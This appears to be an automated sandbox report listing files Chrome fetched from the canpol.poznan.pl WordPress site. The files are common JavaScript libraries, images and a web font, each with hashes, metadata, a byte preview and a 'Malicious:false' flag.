                                                            Preview:/*! This file is auto-generated */./*!. * Masonry PACKAGED v4.2.2. * Cascading grid layout library. * https://masonry.desandro.com. * MIT License. * by David DeSandro. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,r,a){function h(t,e,n){var o,r="$()."+i+'("'+e+'")';return t.each(function(t,h){var u=a.data(h,i);if(!u)return void s(i+" not initialized. Cannot call methods, i.e. "+r);var d=u[e];if(!d||"_"==e.charAt(0))return void s(r+" is not a valid method");var l=d.apply(u,n);o=void 0===o?l:o}),void 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.optio
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):14360
                                                            Entropy (8bit):7.969569236946322
                                                            Encrypted:false
                                                            SSDEEP:384:Ip/lXIbHzhJXCoJUEBvQAE0e7IIf7Bp33sOiQhG7:mWo39ZsOigq
                                                            MD5:1D6F8DBA4042E1B8ECF0A7332AE21C96
                                                            SHA1:DD8CCE8E465BFFB26B39DCB0E587F81B465C762B
                                                            SHA-256:B58A4630A1AD308213182CF878509D2AA3889BEDEB9FF50DF85A3DEAB318BCCF
                                                            SHA-512:80863A6DA192838CD226E3F9D99C5ACCB94993BCD19709152F395FD7417E29B0ACDE6DAD822896ADD026B5DE81D9063186F2F4795300146008D2093FEA804AB1
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/mm_glowna_thumb.png
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...x.U...TH.-t...H... ....T.V\+.W..u........*v..VDA..(.((%.C......w...n.;a.w....L.d..o.|.=.9.....D..m@m.aV92..aCU...e...&.b.....A.w.O.....s.1...;......&.....5.*A.VQUaf"..M@.V.....G..LV...1.U..o..'.....*..`.Z...a~o..8u4p..@y..|.....*..w.Y..O=O..L......wp..6.........^.,[.4I.^z...v..K.>G....O>C."..V.m..k........p...L>n...>......q.2;.;.aVQ.|DFF..L...[.d.....p.Hee%F..91..A.F.".x....\sM...(.F.X...CfH"X.z.]........ADD...U..[3.,.....*+...0..5::.UBB.f+;.#..0Nsm5.FIc...F..Sq......r.1.....b.h'..8R..`9".jp.X.|yn.>}......I...@...\.R..z...............(.Z.n}H.X%(.....eTDD..-....7..H....f.F@I.Y..L.S..?.<./`...i.....+...7..Y..u.Y...aC6........f............\`.. .2...t<.3N..4....Q....:.......&....1n....x.?..;w..v.O?................70...7on.n]...P.....5*X.2j....:th.m.OPF. .;...<../...{....q....4..P.f.....6..V.*n..P.i.o0.o.e2?q.......%&&.oC.<...A....]:.h...so.Q4(..@..O.8..#[....e.-,.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1626)
                                                            Category:downloaded
                                                            Size (bytes):1819
                                                            Entropy (8bit):5.047296238035306
                                                            Encrypted:false
                                                            SSDEEP:24:aUTV//j2ew8p/xnqy8VLF8Xlm7uEQGe1dLpDXzRRvCpx+zVfDpnOKLJWbqQApIsi:HgQBq5LYlm71TopDaW1ObqhuqVcPf
                                                            MD5:CD0EB3406096FF80266E7C9D7D419186
                                                            SHA1:0E3709691BF96233766DE30E2FD473B84166C5B6
                                                            SHA-256:C2E606E1FC82EA3A554AAD5D0520E25D2677B89A891DC5C49E7ACE08FCE92E25
                                                            SHA-512:3CAF5308CDBC5F42F1ECCF5944E8CA785AC086B85954765C1F40D91BD9CC9F3FE6EB816AD821B534F9AD36395F4B6B5D361BEA24EB272E94CAD2824F03FAAAC6
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b
                                                            Preview:/*!. * Masonry v2 shim. * to maintain backwards compatibility. * as of Masonry v3.1.2. *. * Cascading grid layout library. * http://masonry.desandro.com. * MIT License. * by David DeSandro. */.!function(a){"use strict";var b=a.Masonry;b.prototype._remapV2Options=function(){this._remapOption("gutterWidth","gutter"),this._remapOption("isResizable","isResizeBound"),this._remapOption("isRTL","isOriginLeft",function(a){return!a});var a=this.options.isAnimated;if(void 0!==a&&(this.options.transitionDuration=a?this.options.transitionDuration:0),void 0===a||a){var b=this.options.animationOptions,c=b&&b.duration;c&&(this.options.transitionDuration="string"==typeof c?c:c+"ms")}},b.prototype._remapOption=function(a,b,c){var d=this.options[a];void 0!==d&&(this.options[b]=c?c(d):d)};var c=b.prototype._create;b.prototype._create=function(){var a=this;this._remapV2Options(),c.apply(this,arguments),setTimeout(function(){jQuery(a.element).addClass("masonry")},0)};var d=b.prototype.layout;b.prototype.la
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (6406), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):6406
                                                            Entropy (8bit):4.992272460627089
                                                            Encrypted:false
                                                            SSDEEP:192:qgigKTzsXiwDL+M4R76qiY8qgx8s9Zqar4h6ki:FHDgt6CE9Z8h63
                                                            MD5:8FE2803A01C9FA77CB1A2618C3552DCE
                                                            SHA1:2230DD8F0604E4328E7C2A3F9437A6BF2986F592
                                                            SHA-256:E87A1C5E24F9A7C7DCB437417F0B05B0A3C12947CE32D65C990C988A8B5ED4D7
                                                            SHA-512:3F808D49BA7DE395294809EC0C940D6BDB380ED5B3538A69D135A6A97A153DC0B218C0F212FF5B85E45FECF61979BCD5E233ACA020CA6CEED94068225F78AA91
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.7
                                                            Preview:var runtime=function(a){"use strict";var u,t=Object.prototype,h=t.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},n=r.iterator||"@@iterator",e=r.asyncIterator||"@@asyncIterator",o=r.toStringTag||"@@toStringTag";function i(t,r,e){return Object.defineProperty(t,r,{value:e,enumerable:!0,configurable:!0,writable:!0}),t[r]}try{i({},"")}catch(t){i=function(t,r,e){return t[r]=e}}function c(t,r,e,n){var o,i,a,c,r=r&&r.prototype instanceof d?r:d,r=Object.create(r.prototype),n=new j(n||[]);return r._invoke=(o=t,i=e,a=n,c=l,function(t,r){if(c===p)throw new Error("Generator is already running");if(c===y){if("throw"===t)throw r;return k()}for(a.method=t,a.arg=r;;){var e=a.delegate;if(e){var n=function t(r,e){var n=r.iterator[e.method];if(n===u){if(e.delegate=null,"throw"===e.method){if(r.iterator.return&&(e.method="return",e.arg=u,t(r,e),"throw"===e.method))return v;e.method="throw",e.arg=new TypeError("The iterator does not provide a 'throw' method")}return v}var n=f(n,r.iterator,e.arg);if("t
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 250x250, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, height=1152, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=175, yresolution=183, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 14:17:24, width=2048], baseline, precision 8, 984x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):165137
                                                            Entropy (8bit):7.959963972284044
                                                            Encrypted:false
                                                            SSDEEP:3072:MdO4McOLH2EXOrGMh13L9jarCjBb375G3Hf5hBu:Xsq2EXOqMh1Bja+jV5G3HfrA
                                                            MD5:EE4F0A061B39F98ABB695D09C9972EED
                                                            SHA1:DB08BD55A992232AFA555DDFA5BBB2945A73376E
                                                            SHA-256:EDB9EB83E8CA70FE7D8BDD43002261865136657752F4D14A13E277090871DF74
                                                            SHA-512:FEA075AEC1EF7557603948DAB85938D02FB73717C65EE15620865D2DDF4F357FF0386B3AE35CBB9A74F31FB266CD087FFC37F9C2B4A375AA7E48C00A7917A3B7
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2017/09/p-70200-984x500.jpg
                                                            Preview:......JFIF............".Exif..II*...........................................................................................(...........1...%.......2.......................i...............samsung.SM-N910C.................Adobe Photoshop Elements 7.0 Windows.2017:09:08 14:17:24...........*...........2..."...........'.......(...........0220........:...........N...........b...........j...........r...........z.......................................................................0100.................................................................................... ...!...............(...........2016:05:11 15:26:00.2016:05:11 15:26:00.5...d.......d.......d...............d.......d........................d1df98a026cf9af60000000000000000.......................................(...................&.........................................JFIF.....H.H......Adobe_CM......Adobe.d.......................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):22580
                                                            Entropy (8bit):7.984837615415022
                                                            Encrypted:false
                                                            SSDEEP:384:I/+6j1s+9ZsN56k9BJxgwTDZgwdy+4woln5Sl4Yjx/AEU04OpVl8HNVY38f:TqvsN5TrJxgwTNguyNn5SlnAEUVskHNb
                                                            MD5:B4214014B00F2EA0EA2607C8B5E63F2B
                                                            SHA1:95377E6A0C8637198192C5793A04A717EB2F52B3
                                                            SHA-256:DB073AA256AB1BA11B0A852CD30600A9E1B5BAB8E7A7122908EA444D9FEF54DE
                                                            SHA-512:65D09BE88A402086FB948BC2C2C0BAC125B22F3986DB73CC1F5A1CC1B29C3D27B1D1E49B72B9D0F462CB7BB9DD428636BAF127486D5DCB6470E8C907A5D17580
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..].`....ff.f7=.B..w. >..*.<,.`.....{v...x..^PTT.QPQ)?U....@Bz.l......!$........;g.|....SU...]..h..a...a.m...;....HOl.a.k.O...w...e.V..>|...;.9.......a....5.0....<.v8"<Q._AG@.((....{c.....T....A...udX...T....B.iU..e..)..w.A.`....>...dP.w.;H..@}r....."V..3L....8..._@. !.^.p#.`!.g....~..#.0Q.w.......&.BFu...:.(x....a>.8.?.....D..<.J.........Q~.u..l...T.R.F..aO....3J...ey........."v.S...<...!.."l=j.:....c.Z{...V...1.<...z|)e...]..:.>.-.i.../..Q.dX...r.D(.....6.......;N..+...p....*...+..e....W.U...z:l2.s.n..".93.`..a.+'....~...;<..h@......a.W......."..(8..&Grn..Q..O<Q|.u.u..........`.!m...;...t:O.ey...A..T..k.....s...5...02..N.kg.Zw.....j..tD..El..E..J...0.....Z.`.....a...Q....U.R.5.".aa.....k.V...?=.s[.xr..p.Ai..cU.~...***R;u.t06q.A....Q..?(cZ...b.........='"......D.xs.....5I>..Q...T....v.4tJ...Bl.ey.P.d...."..#2.UF.`).~u?z.......cw#.I..../.(wA.k.=.S..Gn...U..i..~..KE...,`!...G...#..Q;
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7973)
                                                            Category:downloaded
                                                            Size (bytes):20787
                                                            Entropy (8bit):5.301875884707572
                                                            Encrypted:false
                                                            SSDEEP:384:8uMSX9vEqkTVScdV/vWxcHsiW58furhDGXvhHQfww/Xc2S8mFkF50y:iScPy+hkLqkJ
                                                            MD5:49FA677B9CD7DDF221DC06537B35E10F
                                                            SHA1:7485F3F99C3C1A57197F2B099F3F8D68B8609D06
                                                            SHA-256:0CD851E5B33AF0FBB354DF65506DA39807B998E07723F3D08ABA5179FA2ED97E
                                                            SHA-512:40D50C965DB656D352C1E73BF3FF9E82B64422398974D55902B0EAAB213FF255AF9338C33D09A8B148DA37B1A13EF0377DE2B510F6B5C7C42C8F866BA3189A54
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                                                            Preview:/*! jQuery UI - v1.12.1 - 2020-09-25.* http://jqueryui.com.* Includes: data.js, disable-selection.js, escape-selector.js, focusable.js, form-reset-mixin.js, form.js, ie.js, jquery-1-7.js, keycode.js, labels.js, plugin.js, position.js, safe-active-element.js, safe-blur.js, scroll-parent.js, tabbable.js, unique-id.js, version.js, widget.js.* Copyright jQuery Foundation and other contributors; Licensed */.!function(t){"function"==typeof define&&define.amd?define(["jquery"],t):t(jQuery)}(function(x){var t,e,n,W,C,o,s,r,l,a,i,h;function E(t,e,i){return[parseFloat(t[0])*(a.test(t[0])?e/100:1),parseFloat(t[1])*(a.test(t[1])?i/100:1)]}function H(t,e){return parseInt(x.css(t,e),10)||0}x.ui=x.ui||{},x.ui.version="1.12.1",./*!. * jQuery UI :data 1.12.1. * http://jqueryui.com. *. * Copyright jQuery Foundation and other contributors. * Released under the MIT license.. * http://jquery.org/license. */.x.extend(x.expr[":"],{data:x.expr.createPseudo?x.expr.createPseudo(function(e){return function(t){r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 350x350, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=15, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=267, yresolution=275, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 12:42:41], progressive, precision 8, 460x390, components 3
                                                            Category:downloaded
                                                            Size (bytes):66691
                                                            Entropy (8bit):7.691796796653048
                                                            Encrypted:false
                                                            SSDEEP:768:VSQrSQlwu/YyCWm0k7Y2VEcLUyd+u5PvrPoJGYRL9YH1dFKGrfv447Ol7TtF3u:VSeSY/vm0kYmUMPvrPoAYRLaH1jKcvFF
                                                            MD5:5AC924ADAEEA4722D84DABB8B4878072
                                                            SHA1:EF2FE14876D16B08035857BD2259BBC927903A75
                                                            SHA-256:78716397A5F94788B0DBFB52F09FE8DFD0EB794287A2DDA2106CF5309156386A
                                                            SHA-512:D053D8207EE9954BAD9B640242447376C76B2C87E7923BC63F9945EC750E375EC4C932D53437B72ADEC8026B8519349EA8E3E2B46A44AD2431BAA1B916A2E348
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/szyte.jpg
                                                            Preview:......JFIF.....^.^.... BExif..II*........... ...................................................................(...........1...........2.......2...;...@...F...................@...................i...........%...........$...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 .^.......^.......Adobe Photoshop 7.0 CE.2018:07:26 12:42:41.................................................................................................................................PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):13043
                                                            Entropy (8bit):7.947984043566014
                                                            Encrypted:false
                                                            SSDEEP:384:I3EZ3czxjOIFZIjmaJzQUhuWzDTQehNYnJ:8EBYjOIF2jmVUhuWXdhenJ
                                                            MD5:F372013D40E14C34651A3EF3B7F235D7
                                                            SHA1:E95D5FA6C2DC2F5EBC5C1CD56AA706695B7A908B
                                                            SHA-256:B4C2EFAA5C9A6C5738258D56803C95228670504FC371CF5AF7AD863B2124AC5C
                                                            SHA-512:15F81AB68B3E355E1AE0B8B791A5D0E4A3897D2594D7652F74ED766A141F28FAEE2BE3FF57AB35738046D1B3C651BDE8ACC5D21EA1EFD0171F1300F57348DD80
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....6"7Rh... .IDATx..g...u....7..h4.nD.D`...$..HJ.H.4.-[...y#.....7.........F.dE.J.DQ.I1...).@#.#...}.p..qo....L.[....o...O.:.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .g...\X.1N.Z....;....z....(%.y..n..b6.}......d./.R.DF..F..[,..pbb.....l.l6K&...}<. .....z.N.T.X,R,.iiiy.....l...R.DI............$..ZZZhoo.......fnn.R.TY.b.....~K.%.z.}.r../...g..lkOO.dQo..kll.b.8.z..?N...-.... ..........+V.L&%(o"..*###8........ITDX.EQ)....;w>.t.............:4.e..Z...2....kEVv.Z..].v....S.U....].*.7n..d2...T,Q.a..T*..w..o...*.h. `.].E.]..R..?..DX.j.......?}.&DV....s.U....kl..).....V..g.....s.tZ."..r.....[.n]..*HD..KBp.J...?...#..NI:....'.....1&!..a]HY9SSS..........(zzz.......d.q$""..%.....?.r.J..pZ.\.......1&/..a].Y.CCC.....RP8....-;88.W..W"".:.h.........+.....^..:.^.u.DC.u^.....?.........}.|
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format (Version 2), TrueType, length 38372, version 1.0
                                                            Category:downloaded
                                                            Size (bytes):38372
                                                            Entropy (8bit):7.994078494945525
                                                            Encrypted:true
                                                            SSDEEP:768:+Yxdr2O1OKvIsc1wqo4CyJBZk0eFs+rCFBVkvQjQRQRjvv+mv9:nV1OKvIBwktQEFB/Rjn/v9
                                                            MD5:16ECEC131289CA4925D35C0515B28D9F
                                                            SHA1:E2CBE7EC2BB494226EA423C7A7353B0E18B304C2
                                                            SHA-256:CB8CAC32D5CEF83E7674916378C2F47BDBBA7E6E6BD936F8026A58AC4E71FA53
                                                            SHA-512:A7ED6208086801275997FCBA3779084400914C74F454FE992FD0AF6E38F4F2F975D2CC63CBE5C1CBA35FE439EC25B0C6B64DD858D036329A2DE720124E70C512
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://fonts.gstatic.com/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2
                                                            Preview:wOF2..............PX...r.........................._...f...?HVAR.l.`?STAT....,/`.....$..)..~.0..\.6.$..`. .....s..[.3q.f.e..v..V<..L..58.......n..q..7......IEd*. .q.4.+..[.(.H(M..W.#.{.c."....n..Y..P.|.(K.o..C.....2..H..x.(.x.M.W.K...-C.@b..p."I.!..N..........N. ..4.."...C.v.;J^.'et....,n.._..G'..n(....r.ON....U.MGf.F(.o...t'.K...........r^_.....<n...[o..o.../.k..uj{.....vk.0.c.Cy.......l........@.. H.Aj........5.V.L..w..zp.._*.'V..yu.%t.4i~.4c.6M..g6.YMW...(..!.]..Ap1dmEAEOOQ..B8.jY.............G.bL&..@ Tmm..][)*..^.....g...re...UQ*..J...r....i?d,g.c...p.].....nn.".....#w.rt!.!.."..w.PD.]....n!:...m..?** HHT.&..."{.u.U.^.n..|Q}.q..."n.....(.-s,.....>.v.q.2.u..........m.O.4.&..R.!...;.f.>..B........YR.eD....;.G.........{h.....c.l.P.) g^7N7..Z._.x..P.....".+I.!..q.G..M.....0..(..t.k./..A..._........v.:3.2pH..\./...WFYE.*..nRFa*T.f.p.....9.K....e....{.3Qg..}....CM.J.....l.-.%S..@.{?....B.....^FBK6&g...9..R~....d.l..........*;]-....Z.7.$..J...B..P.b...i+
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 250x250, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=151, yresolution=159, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 13:55:31], progressive, precision 8, 787x486, components 3
                                                            Category:downloaded
                                                            Size (bytes):592599
                                                            Entropy (8bit):7.980585804243511
                                                            Encrypted:false
                                                            SSDEEP:12288:BGPKhrf520okOdgl8ymsZIdjaBi25plwWXGpLJ9sNEIEfBaUZcKYJ:BGPKRf52LFA+djE/wDk2fAUZcl
                                                            MD5:075DA6110BD086396036C11B112C7957
                                                            SHA1:49D2A50FB908FB0C59316E1B2F4C7550134CF126
                                                            SHA-256:F038E0062C75FC2FA263561C06DC7AE64D011742BED9303006D5D559F9A1A635
                                                            SHA-512:248AEE876850AA24F2A068F2BF962C65DC3A933BFD0D8BE3E2036363A2F95150E598B19C6DC921F71AEF7C9D5A00318BFBCF7903BA2649F5D602D56A1F7AB806
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2017/09/PD-70200.jpg
                                                            Preview:......JFIF............+:Exif..II*...................................................................(...........1...%.......2.......................i...............samsung.SM-N910C..%&..'...%&..'..Adobe Photoshop Elements 7.0 Windows.2017:09:08 13:55:31..........................."...........'.......P...........0220........"...........6...........J...........R...........Z...........b...........j...................................r...........z...........0100.................................................................................... ...................!...........2017:07:07 08:43:13.2017:07:07 08:43:13.....d.......d.......d...............d.......d........................H16LSHA00SM H16LSIG01SA................................................(...............................$(......H.......H.............JFIF.....H.H......Adobe_CM......Adobe.d...............................................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (906), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):906
                                                            Entropy (8bit):5.026818215220488
                                                            Encrypted:false
                                                            SSDEEP:24:ck/I7q5yEwf9ga/9WpqEIfayrXac89Wpq9WRpVod91p0yDn:3kF9gw9WsEISy2c89WE9WRpk9P0yD
                                                            MD5:2C6D3B562A48E0DF5474999DD47E58FB
                                                            SHA1:945220E990EB176C14E53CC663FB01E04E31B59F
                                                            SHA-256:3E6131330963C472B950B8AAF544BA3829735B8CCB103D614BA7793E3A786550
                                                            SHA-512:024CE74A723BF2797AA50D957F4E0C6431F04D1AC9AD6B5A45A17835FEBBEC4557AAD95A01AD0D147C8EC0E68DDBD0732E308C529255F266DC5ED7B98C52B6AE
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.8
                                                            Preview:!function(e,n){e.wp=e.wp||{},e.wp.mediaelement=new function(){var e={};return{initialize:function(){(e="undefined"!=typeof _wpmejsSettings?n.extend(!0,{},_wpmejsSettings):e).classPrefix="mejs-",e.success=e.success||function(e){var n,t;e.rendererName&&-1!==e.rendererName.indexOf("flash")&&(n=e.attributes.autoplay&&"false"!==e.attributes.autoplay,t=e.attributes.loop&&"false"!==e.attributes.loop,n&&e.addEventListener("canplay",function(){e.play()},!1),t&&e.addEventListener("ended",function(){e.play()},!1))},e.customError=function(e,n){if(-1!==e.rendererName.indexOf("flash")||-1!==e.rendererName.indexOf("flv"))return'<a href="'+n.src+'">'+mejsL10n.strings["mejs.download-file"]+"</a>"},n(".wp-audio-shortcode, .wp-video-shortcode").not(".mejs-container").filter(function(){return!n(this).parent().hasClass("mejs-mediaelement")}).mediaelementplayer(e)}}},n(e.wp.mediaelement.initialize)}(window,jQuery);
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8752)
                                                            Category:dropped
                                                            Size (bytes):8869
                                                            Entropy (8bit):5.258349832137265
                                                            Encrypted:false
                                                            SSDEEP:192:bwlC7Gd4QY6Pm+OrOJ42uVOpDsu1mx3AJzE8iOYFfycBmSCc:beC7Gd4QPm+Or0WOpou1mxQlEzOYFd
                                                            MD5:B1D092D72FDD1DA14095576BE8B65036
                                                            SHA1:4318FA6BF409BF14835F44252900E6BC0CF40AF8
                                                            SHA-256:13ACF7693956ABA0A79DE99BBCABE8A407AAE283AB8A258196D7E2ABFC28E07F
                                                            SHA-512:0BBA333A38355A6E6910EFBA1C3E48344210456913BC55EC14F022E120771DF1B2A2ADB13F60E37AFFAB42DD1A29647DA8F67B7AF0C0C44109A7E3FD03BCA864
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * imagesLoaded PACKAGED v3.1.8. * JavaScript is all like "You images are done yet or what?". * MIT License. */..(function(){function e(){}function t(e,t){for(var n=e.length;n--;)if(e[n].listener===t)return n;return-1}function n(e){return function(){return this[e].apply(this,arguments)}}var i=e.prototype,r=this,o=r.EventEmitter;i.getListeners=function(e){var t,n,i=this._getEvents();if("object"==typeof e){t={};for(n in i)i.hasOwnProperty(n)&&e.test(n)&&(t[n]=i[n])}else t=i[e]||(i[e]=[]);return t},i.flattenListeners=function(e){var t,n=[];for(t=0;e.length>t;t+=1)n.push(e[t].listener);return n},i.getListenersAsObject=function(e){var t,n=this.getListeners(e);return n instanceof Array&&(t={},t[e]=n),t||n},i.addListener=function(e,n){var i,r=this.getListenersAsObject(e),o="object"==typeof n;for(i in r)r.hasOwnProperty(i)&&-1===t(r[i],n)&&r[i].push(o?n:{listener:n,once:!1});return this},i.on=n("addListener"),i.addOnceListener=function(e,t){return this.addListener(e,{listener:t,once:!0})},
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8354)
                                                            Category:dropped
                                                            Size (bytes):8539
                                                            Entropy (8bit):5.051633363365418
                                                            Encrypted:false
                                                            SSDEEP:192:WzLY1jWBoYf0/AgJbgmAGCkHYp5odNd882EeANEjCWe7:WzLSWBoYfqAgJLrHe5odNd882EeANEjK
                                                            MD5:4B16E073282E3D8BBE1093B7CDAAEA84
                                                            SHA1:15BC43DF0109106319412A19D535478234E12ED6
                                                            SHA-256:69FC7BCAFEE09477B13DBDA32D00410BC15A3FAEB3E890CC15FEF46D7C84D432
                                                            SHA-512:E159061E064257C9A9EEABEF77EEB9AA98E5ABA6FB4AA2981F4D22D3EE5E46EB3DBF15A3659CC103B3E446991FA7DDAC8ED24E0D10DEF3030C5C72C4CA6199E7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*!. * jQuery UI Autocomplete 1.12.1. * http://jqueryui.com. *. * Copyright jQuery Foundation and other contributors. * Released under the MIT license.. * http://jquery.org/license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery","./menu","./core"],e):e(jQuery)}(function(o){return o.widget("ui.autocomplete",{version:"1.12.1",defaultElement:"<input>",options:{appendTo:null,autoFocus:!1,delay:300,minLength:1,position:{my:"left top",at:"left bottom",collision:"none"},source:null,change:null,close:null,focus:null,open:null,response:null,search:null,select:null},requestIndex:0,pending:0,_create:function(){var i,s,n,e=this.element[0].nodeName.toLowerCase(),t="textarea"===e,e="input"===e;this.isMultiLine=t||!e&&this._isContentEditable(this.element),this.valueMethod=this.element[t||e?"val":"text"],this.isNewMenu=!0,this._addClass("ui-autocomplete-input"),this.element.attr("autocomplete","off"),this._on(this.element,{keydown:function(e){if(this.element.prop("readOnly"))s=
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):19870
                                                            Entropy (8bit):7.978052151519322
                                                            Encrypted:false
                                                            SSDEEP:384:IO7c3tAbsgODpT+k25sCIcUhLMys9Tr2s0h4Pqoage98AQ2b1sDw91J:b7c3ui0lIBMyc2s64PqnuosDw91J
                                                            MD5:5D6FCBA87A5C9233C701EA1F5B767B6D
                                                            SHA1:2094E1E3DD7AC4A9C703E6C8B510F74E3282778D
                                                            SHA-256:FBC360FB2A51B602A44561E52B04D7B74003174B7F1B9809E6CCD61DA0437F85
                                                            SHA-512:1E59FE00CCB485F0081C0619AB3C8F34C8E7D0EBBD28C0F104CF29F0F01510245E6C799ADB604376457BDA141F1CCF37E0F6E034D1EE2457FA4ECB0EA3C2F107
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_minnie.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......*.}.... .IDATx.....y.....u.}..=.3....E. ..%.5)i-yC...[......o.~...?.-Gl..a.w..B+.6v).%.$A.7....}wO..]w...L.....M....DT.g0].......<..`.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,?....'.1.........W...8.+Y....|..<...~.T*]........7!DfG.../.Hy.n......N..:U*.(.J..E. ..};H?.$IB...z=....n.j.zqzz..J..".H.(Y.........uuu..*.J.j......_ ...h.Z.z......E.^..pY.........s....T*.....%p_...t........P(..6\.... V..7_RJ.x...r...._"..!kkk............+X.F..Z.c..\xunn.6==m.....677.O.>.+R.+B.cG...E...p../]...O.8....r.m].tip..?..r...B.Q...3...`...].?O.8..\..Q.$..K..G.Q>..WV..`.L.@...g.y........{.7|..>.8....Z..Y.V...^{..'.B.........|.r...? ......v.~b...\.......+...P(0??_.r..K.....OR..F..R........H....z..h........OJ.*7n........a..8x. 7n....1.;.V.>.............-?IhX..Kw....c.gG.........
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5405)
                                                            Category:downloaded
                                                            Size (bytes):5440
                                                            Entropy (8bit):5.085457448295079
                                                            Encrypted:false
                                                            SSDEEP:96:BAj0uKglDu/3+GrURolI93CzaAglFYSt5s8G0QF6aVRRVKX:Sj0fglq3oRB93e+lFvt2jhKX
                                                            MD5:10EB2A823CB3051E10C7395768745F5B
                                                            SHA1:D1002D92D3B59802D22742CD8172A4EC8918FFAD
                                                            SHA-256:04E6FB814FCCCE3A0AECB83BE0BC24665CF3E6A5E993F296471A63708F63E138
